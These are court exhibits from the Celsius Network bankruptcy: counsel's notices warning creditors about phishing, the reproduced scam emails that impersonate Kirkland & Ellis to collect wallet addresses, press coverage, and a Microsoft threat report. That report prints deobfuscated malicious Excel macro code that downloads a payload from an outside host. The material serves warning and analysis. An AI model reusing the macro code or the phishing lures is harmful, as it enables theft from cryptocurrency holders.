© 2023 Bloomberg Industry Group, Inc.   All Rights Reserved
Browse More Stories in Bankruptcy Law

**Exhibit I**

Joshua A. Sussberg, P.C.
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
601 Lexington Avenue
New York, New York 10022
Telephone:     (212) 446-4800
Facsimile:     (212) 446-4900

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:     (312) 862-2000
Facsimile:     (312) 862-2200

*Counsel to the Debtors and Debtors in Possession*

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) | Case No. 22-10964 (MG) |
| | ) | |
| Debtors. | ) | (Jointly Administered) |
| | ) | |

**NOTICE OF PHISHING ATTEMPTS**

**PLEASE TAKE NOTICE** that on November 29, 2022, the Debtors became aware that

phishing emails were being sent to certain of the Debtors' customers purporting to be restructuring

associates at Kirkland & Ellis LLP, requesting that customers submit their wallet addresses and

other account information to receive claim distributions.  Copies of such emails are attached to

this notice as **Exhibit A**.

**PLEASE TAKE FURTHER NOTICE** that these emails are ***not an authorized message***

***from the Debtors' legal advisors and are likely a phishing scam***.

---

[1]     The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification
number, are:  Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius
Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks
Lending LLC (3390); and Celsius US Holding LLC (7956).  The location of Debtor Celsius Network LLC's
principal place of business and the Debtors' service address in these chapter 11 cases is 50 Harrison Street,
Suite 209F, Hoboken, New Jersey 07030.

PLEASE TAKE FURTHER NOTICE *that neither the Debtors nor their advisors will ever contact you by email, telephone call, or otherwise requesting account information or other personal information absent an Order from the Court.*

PLEASE TAKE FURTHER NOTICE that the Debtors are also aware of other telephonic phishing scams that are also *not authorized messages from the Debtors' advisors*.

PLEASE TAKE FURTHER NOTICE that if you receive any message purporting to be from the Debtors or their advisors and requesting account information or personal information, contact the Debtors *immediately* at CelsiusCreditorQuestions@kirkland.com or the Debtors' claims agent, Stretto, at CelsiusInquiries@stretto.com.

[*Remainder of page intentionally left blank*]

2

A0377

New York, New York
Dated: November 30, 2022

*/s/ Joshua A. Sussberg*
_____

**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
Joshua A. Sussberg, P.C.
601 Lexington Avenue
New York, New York 10022
Telephone:      (212) 446-4800
Facsimile:      (212) 446-4900
Email:          jsussberg@kirkland.com

 - and -

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:      (312) 862-2000
Facsimile:      (312) 862-2200
Email:          patrick.nash@kirkland.com
                ross.kwasteniet@kirkland.com
                chris.koenig@kirkland.com
                dan.latona@kirkland.com

*Counsel to the Debtors and Debtors in Possession*

**Exhibit A**

**Phishing Emails**

█████████

**From:** ████████████████
**Sent:** Wednesday, November 30, 2022 10:59 AM
**To:** ███████████████████
**Subject:** FW: Fwd: Celsius Network LLC Chapter 11 Proceedings

On Wed, 30 Nov at 1:41 AM , ████████████████████████ wrote:

[External Email]

Hi,

I got an e-mail from

**Rebecca J. M. rebeccajmarston@hotmail.com via gmail.mcsv.net**

It is asking for recovery addresses to send funds etc.

I just wanted to check is this a legit request related to the case or is it some sort of Phishing -- as I see it's sent from a Hotmail address

**Best,**

██████████

**Email:** ████████████████
**Skype:** ████████████  **Linkedin:** ████████

---------- Forwarded message ---------
From: **Rebecca J. M.** <rebeccajmarston@hotmail.com>
Date: Tue, Nov 29, 2022 at 2:54 PM
Subject: Celsius Network LLC Chapter 11 Proceedings
To: ██████████████████████████



# Celsius Network LLC Chapter 11 proceedings

You're receiving this email because you have a claim in the Celsius Network LLC restructuring matter.

**Step 1: Review the amount of your claim listed by Celsius Network LLC.**

Your claim is listed in Schedule EF Part 3 as a General Unsecured claim comprising of the coin(s) listed in the spreadsheet below. This is your claims form:

https://drive.google.com/file/d/1-0Ucmi6O4n9kp1wr6Dg19xBwac3ECuoJ/view?usp=sharing

Please utilise the following unique password to access the file: 241572

**Step 2: If you agree with the type and amount of your claim listed above, you do not need to file a new claim. You only need to provide a recovery address in the designated column, to complete your claim.**

Customers only need to supply a recovery address on the claims form, for these chapter 11 cases if their claim is listed on the Schedules filed by the Debtors, *provided* that (i) the claimant does not disagree with the amount, nature, and priority of the Claim as set forth in the Schedules; and (ii) the claimant does not dispute that the Claim is an obligation only of the specific Debtor against which the Claim is listed in the Schedules.

**Step 3: If you disagree with your scheduled claim listed above, you must provide the**

**A0381**

**corrected details on or before the General Bar Date, or be forever barred from further recovery.**

If you need to provided corrected details (because you disagree with the scheduled claim listed above), please use the spreadsheet linked above to submit your claim.

**We recommend filing your claim and/or providing a recovery address as soon as possible, so that any corrections can be processed before the General Bar Date. Please contact us at the earliest if there are any discrepancies in your claims spreadsheet.**

You may also reach out on a reply to this email for any clarifications.

Best regards,
Rebecca J. M.
Celsius Legal Team



A0382



*Copyright © 2022 Cases.stretto, All rights reserved.*

You are receiving this email because you opted in via our website.

**Our mailing address is:**

Cases.stretto

410 Exchange

Irvine, CA 92602-1329


[Add us to your address book](#)


Want to change how you receive these emails?

You can update your preferences or unsubscribe from this list.

A0383

**From:** ▮▮▮▮▮▮▮▮ on behalf of info@kirkland.com
**Sent:** Wednesday, November 30, 2022 8:18 AM
**To:** Reiney, Margaret
**Subject:** FW: Celsius Creditor Verification

Hello Margaret - the below inquiry was received in the info@kirkland.com inbox.

Please forward, respond, or disregard as applicable. Thank you.

▮▮▮▮▮▮▮
Business Intake Supervisor

**KIRKLAND & ELLIS LLP**
300 North LaSalle, Chicago, IL 60654
▮▮▮▮▮▮▮
**F** +1 312 862 2200

▮▮▮▮▮▮▮▮

**From:** ▮▮▮▮▮▮▮▮▮▮
**Sent:** Saturday, November 26, 2022 5:55 PM
**To:** info@kirkland.com
**Subject:** Re: Celsius Creditor Verification

**This message is from an EXTERNAL SENDER**
Be cautious, particularly with links and attachments.

Checking in on this again. Thanks.

> On Nov 23, 2022, at 2:32 PM, ▮▮▮▮▮▮▮▮▮▮ wrote:
>
> Hello. Can you please verify the legitimacy of the attached email?

1

**A0384**

Is this indeed a representative of your firm reaching out from a hotmail email address?

This feels like a scam.

Thanks.

Begin forwarded message:

**From:** Margaret Reiney <[margaretreiney@hotmail.com](mailto:margaretreiney@hotmail.com)>
**Date:** November 23, 2022 at 1:38:52 PM EST
**To:** ███████████████
**Subject: Celsius Creditor Verification**
**Reply-To:** Margaret Reiney <[margaretreiney@hotmail.com](mailto:margaretreiney@hotmail.com)>



## Hi Cesius Creditor,

I'm Margret Reiney, associate at Kirkland & Ellis. As you may know, we're handling the bankruptcy proceedings for Celsius Inc. As per the court order dated November 16, 2022 (linked below), we are

2

**A0385**

required to verify the balances of each user, and issue an initial refund installment equal to 25% of the value of customer assets.

To streamline this process, we're attaching a copy of our assets on file for your account, for you to verify.

We request you to execute four steps as indicated on the spreadsheet to receive the initial installment, in the next seven (7) days:

1. Check the asset amounts. If incorrect, please edit and provide the correct amounts - we will double check our database, and request proof of funds if required.
2. Indicate correctness of the asset values.
3. Provide refund addresses. This must be a personal wallet, not an exchange address.
4. Recommended: Perform a test transaction with the refund address, as stated in the spreadsheet - for speedy verification.

Please access the document via the google drive link provided below. The spreadsheet is password protected for internal confidentiality - please use your unique customer ID as the password: —————-

After performing the above steps, and filling in the spreadsheet, attach the updated document in a reply to this email.

Please feel free to reach out if you have any questions.

(Case

Ref. https://cases.stretto.com/public/x191/11749/CORRESPONDENCE/1174911162250000000067.pdf)


Best Regards,

Margret Reiney

Kirkland & Ellis

https://www.kirkland.com/


This email and any files transmitted with it is confidential and intended only for the person or entity to whom it is addressed. If you are not the intended recipient (or the person responsible for delivering emails to the intended recipient), then you have received this email in error and any use, dissemination, forwarding, printing or copying of this email and its file attachments is prohibited. Please notify the sender immediately by reply email or by using any of the above contact details, delete the misdirected email from your system, and destroy any copies you have made of it. We do not accept any liability for loss or damage which may arise from your receipt of this email.

**A0387**



**Download Customer_1124_Assets.xls**

*Copyright © 2022 Kirkland & Ellis, All rights reserved.*
You are receiving this email because you opted in via our website.

**Our mailing address is:**
Kirkland & Ellis
IL-43
US
Chicago, IL 60004

Add us to your address book

A0388

Want to change how you receive these emails?

You can update your preferences or unsubscribe from this list.

Grow your business with mailchimp

Joshua A. Sussberg, P.C.
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
601 Lexington Avenue
New York, New York 10022
Telephone:     (212) 446-4800
Facsimile:     (212) 446-4900

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:     (312) 862-2000
Facsimile:     (312) 862-2200

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) | Case No. 22-10964 (MG) |
| | ) | |
| Debtors. | ) | (Jointly Administered) |
| | ) | |

---

### SUPPLEMENTAL NOTICE OF PHISHING ATTEMPTS

**PLEASE TAKE NOTICE** that on November 30, 2022, the Debtors filed the *Notice of Phishing Attempts* [Docket No. 1527] (the "Original Notice") to inform parties in interest of phishing emails sent to certain of the Debtors' customers purporting to be from restructuring associates at Kirkland & Ellis LLP and requesting that customers submit their wallet addresses

---

[1]     The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are:  Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); Celsius US Holding LLC (7956); GK8 Ltd. (1209); GK8 UK Limited (0893); and GK8 USA LLC (9450).  The location of Debtor Celsius Network LLC's principal place of business and the Debtors' service address in these chapter 11 cases is 50 Harrison Street, Suite 209F, Hoboken, New Jersey 07030.

and other account information to receive claim distributions.  Copies of such emails are attached to the Original Notice as <u>Exhibit A</u>.

       **PLEASE TAKE FURTHER NOTICE** that these emails are ***not an authorized message*** from the Debtors' legal advisors and, based on both internal and external investigations, are ***strongly suspected to be a phishing scam aimed at gaining remote access to account holders' computers and stealing financial assets***.  The source of these emails remains unconfirmed at this time.

       **PLEASE TAKE FURTHER NOTICE** that third-party reports and articles discussing these and similar attacks targeting cryptocurrency customers are attached hereto as **<u>Exhibit A</u>**.

       **PLEASE TAKE FURTHER NOTICE** that neither the Debtors nor their advisors will **_ever_** contact you by email, telephone call, or otherwise to request account information or other personal information absent an (i) order or (ii) on-the-record instruction from the Court.

       **PLEASE TAKE FURTHER NOTICE** that if you receive any message purporting to be from the Debtors or their advisors and requesting account information or personal information, we ask that you please contact the Debtors ***immediately*** at CelsiusCreditorQuestions@kirkland.com or the Debtors' claims agent, Stretto, at CelsiusInquiries@stretto.com.

<p style="text-align:center"><em>[Remainder of page intentionally left blank]</em></p>

<p style="text-align:center"><strong>A0391</strong></p>

New York, New York
Dated: December 13, 2022

/s/ Joshua A. Sussberg

**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
Joshua A. Sussberg, P.C.
601 Lexington Avenue
New York, New York 10022
Telephone:     (212) 446-4800
Facsimile:      (212) 446-4900
Email:          joshua.sussberg@kirkland.com

  - and -

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:     (312) 862-2000
Facsimile:      (312) 862-2200
Email:          patrick.nash@kirkland.com
                ross.kwasteniet@kirkland.com
                chris.koenig@kirkland.com
                dan.latona@kirkland.com

*Counsel to the Debtors and Debtors in Possession*

**Exhibit A**

**Phishing Attack Reports**

Free Newsletter Sign Up

Privacy & Data Security Law

# Scammers, Posing as Kirkland Lawyers, Phishing Celsius Customers

By James Nani

Dec. 1, 2022, 1:11 PM

- Phishing attempts highlight fight between privacy, transparency
- Scam seeks to access personal digital wallets, Kirkland says

Scammers pretending to be Kirkland & Ellis LLP restructuring associates are sending phishing emails to customers of bankrupt crypto lender Celsius Network LLC in an effort to access crypto wallets, a Kirkland attorney told a bankruptcy court.

Phishing attempts targeting Celsius customers are also occurring via telephone, Joshua Sussberg, a partner at Kirkland and Celsius' lead bankruptcy attorney, told the US Bankruptcy Court for the Southern District of New York in court papers Wednesday.

The phishing emails highlight a growing schism in cryptocurrency bankruptcies between privacy and court transparency.

The scam emails portray the Celsius logo and tell customers to click on a link to a spreadsheet to view their claim, according to court papers. The customer is asked to provide an address to their personal digital wallet, recommends performing a "test transaction," and says the company will "issue an initial refund installment equal to 25% of the value of customer assets."

The email names a Kirkland associate, and also says it comes from the Celsius legal team.

Judge Martin Glenn in September ruled that individual Celsius customers' home and email addresses could be redacted, but their names could not. Information about business entities that are creditors were also required to be revealed. Creditors must also reveal their names to provide proofs of claim, Glenn ruled.

The case is Celsius Network LLC, Bankr. S.D.N.Y., No. 22-10964, notice 11/30/22.

A0394



**Portfolio Media. Inc.** | 111 West 19th Street, 5th floor | New York, NY 10011 | www.law360.com
Phone: +1 646 783 7100 | Fax: +1 646 783 7161 | customerservice@law360.com

# Celsius Ch. 11 Creditors Hit With Crypto Phishing Attacks

By **Vince Sullivan**

Law360 (December 1, 2022, 4:12 PM EST) -- Bankrupt cryptocurrency lending platform Celsius Network Ltd. told a New York judge late Wednesday that some of its customers have been subjected to phishing attacks, with scammers posing as attorneys from the debtor's bankruptcy counsel.

In a notice filed on the case docket in New York bankruptcy court, Celsius said it became aware this week of targeted attacks against some of its customers via email, with the scammers pretending to be Kirkland & Ellis LLP attorneys seeking the customers' digital wallet addresses and other information about their Celsius accounts.

The debtor also said it was aware of other scams occurring via telephone.

"Please take further notice that neither the debtors nor their advisers will ever contact you by email, telephone call, or otherwise requesting account information or other personal information absent an order from the court," the notice said.

Customers and other creditors are urged to contact the debtor through bankruptcy counsel Kirkland & Ellis or its claims agent, Stretto.

Examples of the phishing emails attached to the order show they came from an email address using the Hotmail.com domain, but purport to be from a member of the Kirkland & Ellis team working on the Celsius case. In the messages, the scammers include links to shared spreadsheets asking the creditors to add their digital wallet address — a unique string of letters and numbers known as a public key and identifying a wallet that stores digital assets like cryptocurrency.

The messages say that the bankruptcy judge presiding over the cases had authorized release of some cryptocurrency assets from Celsius accounts to customers, and that the requested information was needed to send the disbursements. No such authorization has been granted in the case.

"Issuing an advisory was an important step toward both ensuring sensitive information is not shared with bad actors and warding off malicious actors from requesting information during this period of heightened awareness and vulnerability," debtor attorney Patrick J. Nash Jr. of Kirkland & Ellis told Law360. "The company remains focused on acting in the best interest of all customers and other stakeholders."

Since the filing of its bankruptcy in July, Celsius has said it is focused on returning maximum value to its customers. In September, it filed a motion with the court seeking to allow customers to resume withdrawals from certain types of accounts, arguing that most of the digital assets in Withhold and Custody accounts are likely **not property of the estate**. A hearing on this motion is scheduled to begin **next week**.

An **interim report** released in November by the **Chapter 11 trustee** appointed in the case said there were problems with the company's internal financial controls that led to the commingling of customer assets in Celsius digital wallets, making it difficult for individual customers to lay claim to specific assets.

Celsius **filed for bankruptcy** in July in the aftermath of a marked decline in cryptocurrency assets. Celsius previously said it believed the assets in its rewards-bearing Earn accounts belong to the

company, while amounts in the Custody accounts belong to customers. It also said the Withhold accounts are likely customer property.

Filing in the first wave of the crypto winter, Celsius commenced its bankruptcy in the same time frame as crypto platform Voyager Digital Holdings and crypto hedge fund Three Arrows Capital. They were all victims of the collapse of the Luna coin and a related stablecoin pegged to the U.S. dollar.

Another wave of crypto bankruptcies began last month when exchange FTX Trading Ltd. imploded due to the crash of its custom token, FTT, and its exposure to a related trading fund called Alameda Research. FTX and more than 130 affiliates, including Alameda, **filed for Chapter 11** in Delaware on Nov. 11, **followed** by trading platform BlockFi Inc., which had tremendous exposure to FTX.

Celsius is represented by Joshua A. Sussberg, Patrick J. Nash Jr., Ross M. Kwasteniet, Christopher S. Koenig and Dan Latona of Kirkland & Ellis LLP.

The case is In re: Celsius Network LLC et al., case number 1:22-bk-10964, in the U.S. Bankruptcy Court for the Southern District of New York.

--Additional reporting by Rick Archer. Editing by Alanna Weissman.

---

All Content © 2003-2022, Portfolio Media, Inc.

A0396



#1 Trusted Cybersecurity News Platform

| 🏠 Home | ✉ Newsletter | 🛒 Store |
| --- | --- | --- |

# North Korean Hackers Spread AppleJeus Malware Disguised as Cryptocurrency Apps

📅 Dec 05, 2022      👤 Ravie Lakshmanan







**A0397**

The Lazarus Group threat actor has been observed leveraging fake cryptocurrency apps as a lure to deliver a previously undocumented version of the AppleJeus malware, according to new findings from Volexity.

"This activity notably involves a campaign likely targeting cryptocurrency users and organizations with a variant of the AppleJeus malware by way of malicious Microsoft Office documents," researchers Callum Roxan, Paul Rascagneres, and Robert Jan Mora said.

The North Korean government is known to adopt a three-pronged approach by employing malicious cyber activity that's orchestrated to collect intelligence, conduct attacks, and generate illicit revenue for the sanctions hit nation. The threats are collectively tracked under the name Lazarus Group (aka Hidden Cobra or Zinc).

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

"North Korea has conducted cyber theft against financial institutions and cryptocurrency exchanges worldwide, potentially stealing hundreds of millions of dollars, probably to fund government priorities, such as its nuclear and missile programs," per the 2021 Annual Threat Assessment released by U.S. intelligence agencies.

Earlier this April, the Cybersecurity and Infrastructure Security Agency (CISA) warned of an activity cluster dubbed TraderTraitor that targets cryptocurrency exchanges and trading companies through trojanized crypto apps for Windows and macOS.



While the TraderTraitor attacks culminate in the deployment of the Manuscrypt remote access trojan, the new activity makes use of a supposed crypto trading website named BloxHolder, a

A0398

copycat of the legitimate HaasOnline platform, to deliver AppleJeus via an installer file.

AppleJeus, first documented by Kaspersky in 2018, is designed to harvest information about the infected system (i.e., MAC address, computer name, and operating system version) and download shellcode from a command-and-control (C2) server.

The attack chain is said to have undergone a slight deviation in October 2022, with the adversary shifting from MSI installer files to a booby-trapped Microsoft Excel document that uses macros to download a remotely hosted payload, a PNG image, from OpenDrive.

The idea behind the switch is likely to reduce static detection by security products, Volexy said, adding it couldn't obtain the image file ("Background.png") from the OpenDrive link but noted it embeds three files, including an encoded payload that's subsequently extracted and launched on the compromised host.

"The Lazarus Group continues its effort to target cryptocurrency users, despite ongoing attention to their campaigns and tactics," the researchers concluded.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



| | Tweet | | Share | | Share |

A0399

Microsoft

**Microsoft Security**

Solutions⌄    All Microsoft⌄

⌄

December 6, 2022 • 17 min read

# DEV-0139 launches targeted attacks against the cryptocurrency industry

Microsoft Security Threat Intelligence

Share

Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.

We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target's trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022

A0400

invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.

After gaining the target's trust, DEV-0139 then sent a weaponized Excel file with the name *OKX Binance & Huobi VIP fee comparision.xls* which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:

1. A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.

2. The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into *C:\ProgramData\Microsoft Media\* with the name *VSDB688.tmp*

3. The file *VSDB688.tmp* downloads a PNG file containing three executables: a legitimate Windows file named *logagent.exe*, a malicious version of the DLL *wsock32.dll*, and an XOR encoded backdoor.

4. The file *logagent.exe* is used to sideload the malicious *wsock32.dll*, which acts as a DLL proxy to the legitimate *wsock32.dll*. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.

A0401



Figure 1. Overview of the attack

Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a *CryptoDashboardV2* application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.

In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of

A0402

information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

# Initial compromise

To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name *<NameOfTheTargetedCompany> <> OKX Fee Adjustment* and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.

A0403



Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)

It's worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The

A0404

threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.

After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.

# Weaponized Excel file analysis

The weaponized Excel file, which has the file name *OKX Binance & Huobi VIP fee comparision.xls* (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user *Wolf*:

**A0405**

| File name | **OKX Binance & Huobi VIP fee comparision.xls** |
|---|---|
| CompObjUserTypeLen | 31 |
| CompObjUserType | Microsoft Excel 2003 Worksheet |
| ModifyDate | 2022:10:14 02:34:33 |
| TitleOfParts | Comparison_Oct 2022 |
| SharedDoc | No |
| Author | Wolf |
| CodePage | Windows Latin 1 (Western European) |
| AppVersion | 16 |
| LinksUpToDate | No |
| ScaleCrop | No |
| LastModifiedBy | Wolf |
| HeadingPairs | Worksheets, 1 |
| FileType | XLS |
| FileTypeExtension | xls |
| HyperlinksChanged | No |
| Security | None |
| CreateDate | 2022:10:14 02:34:31 |
| Software | Microsoft Excel |
| MIMEType | application/vnd.ms-excel |

**A0406**



Figure 3. The information in the malicious Excel file

The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is *IFUZYDTTOP*, and the macro retrieves the information with the following code *IFUZYDTTOP.MgQnQVGb.Caption* where *MgQnQVGb* is the name of the label in the UserForm and *.caption* allows to retrieve the information stored into the UserForm.

The table below shows the data retrieved from the UserForm:

A0407

| Obfuscated data | Original data |
|---|---|
| IFUZYDTTOP.nPuyGkKr.Caption & IFUZYDTTOP.jpqKCxUd.Caption | MSXML2.DOMDocum |
| IFUZYDTTOP.QevjtDZF.Caption | b64 |
| IFUZYDTTOP.MgQnQVGb.Caption | bin.base64 |
| IFUZYDTTOP.iuiITrLG.Caption | Base64 encoded Seco |
| IFUZYDTTOP.hMcZvwhq.Caption | C:\ProgramData\Micro |
| IFUZYDTTOP.DDFyQLPa.Caption | \VSDB688.tmp |
| IFUZYDTTOP.PwXgwErw.Caption & IFUZYDTTOP.ePGMifdW.Caption | Excel.Application |

The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory *C:\ProgramData\Microsoft Media* as *VSDB688.tmp* and runs in invisible mode.

```
Sub OpenNewWorkbook(FileName, DirectoryandFIlename)

    On Error Resume Next
    Dim LHVROQMN As Object

    Set LHVROQMN = FileName.Workbooks.Open(DirectoryandFIlename)
    FileName.Application.Visible = False

    Set FileName = Nothing
    Set LHVROQMN = Nothing

End Sub
```

Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.

Additionally, the main sheet in the Excel file is protected with the password *dragon* to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.

**A0408**

# Extracted worksheet

The second Excel file, *VSDB688.tmp* (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:

A0409

| File Name | **VSDB688.tmp** |
|---|---|
| CompObjUserType | Microsoft Excel 2003 Worksheet |
| ModifyDate | 2022:08:29 08:07:24 |
| TitleOfParts | Sheet1 |
| SharedDoc | No |
| CodePage | Windows Latin 1 (Western European) |
| AppVersion | 16 |
| LinksUpToDate | No |
| ScaleCrop | No |
| CompObjUserTypeLen | 31 |
| HeadingPairs | Worksheets, 1 |
| FileType | XLS |
| FileTypeExtension | xls |
| HyperlinksChanged | No |
| Security | None |
| CreateDate | 2006:09:16 00:00:00 |
| Software | Microsoft Excel |
| MIMEType | application/vnd.ms-excel |

**A0410**



Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.

The table below shows the deobfuscated data retrieved from the UserForm:

| Obfuscated data | Original data |
|---|---|
| GGPJPPVOJB.GbEtQGZe.Caption & GGPJPPVOJB.ECufizoN.Caption | MSXML2.DOMDocum |
| GGPJPPVOJB.BkxQNjsP.Caption | b64 |
| GGPJPPVOJB.slgGbwvS.Caption | bin.base64 |
| GGPJPPVOJB.kiTajKHg.Caption | C:\ProgramData\Softw |
| GGPJPPVOJB.fXSPzIWf.Caption | logagent.exe |
| GGPJPPVOJB.JzrHMGPQ.Caption | wsock32.dll |
| GGPJPPVOJB.pKLagNSW.Caption | 56762eb9-411c-4842- |
| GGPJPPVOJB.grzjNBbk.Caption | /shadow |
| GGPJPPVOJB.aJmXcCtW.Caption & GGPJPPVOJB.zpxMSdzi.Caption | MSXML2.ServerXMLH |
| GGPJPPVOJB.rDHwJTxL.Caption | Get |

The macro retrieves some parameters from the UserForm then downloads a PNG file from

*hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86 c73/Background.png*. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.

**A0412**

```
Public Function GetPNG()
    On Error Resume Next

    Dim Request As Object
    Dim URL As String
    Set Request = CreateObject(MSXML2.ServerXMLHTTP.6.0)

    URL = "https://od.lk/d/d021d412be456a6f78a8052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png"
    Request.Open Get, URL, False
    Request.Send

    If Request.Status = 200 Then
     GetPNG = Request.ResponseBody
    Else
     Application.Quit
    End If

    Set Request = Nothing

End Function
```

Figure 6. Deobfuscated code that shows the download of the file *Background.png*

The PNG is then split into three parts and written in three different files: the legitimate file *logagent.exe,* a malicious version of w*sock32.dll*, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.

```
If Dir(PATH & logagent) = "" Or Dir(PATH & sockdll) = "" Or Dir(PATH & IDDll) = "" Then

    GetPNG = GetPNG

    If Dir(PATH & logagent) = "" Then
     Call WriteFile(GetPNG, PATH & logagent, 1441, 112640)
    Else
    End If


    If Dir(PATH & sockdll) = "" Then
     Call WriteFile(GetPNG, PATH & sockdll, 114081, 99328)
    Else
    End If


    If Dir(PATH & IDDll) = "" Then
     Call WriteFile(GetPNG, PATH & IDDll, 213409, 116224)
    Else
    End If
Else
End If
```

Figure 7. The three files are written into *C:\\ProgramData\SoftwareCache\* and run using the *CreateProcess* API

**A0413**

# Loader analysis

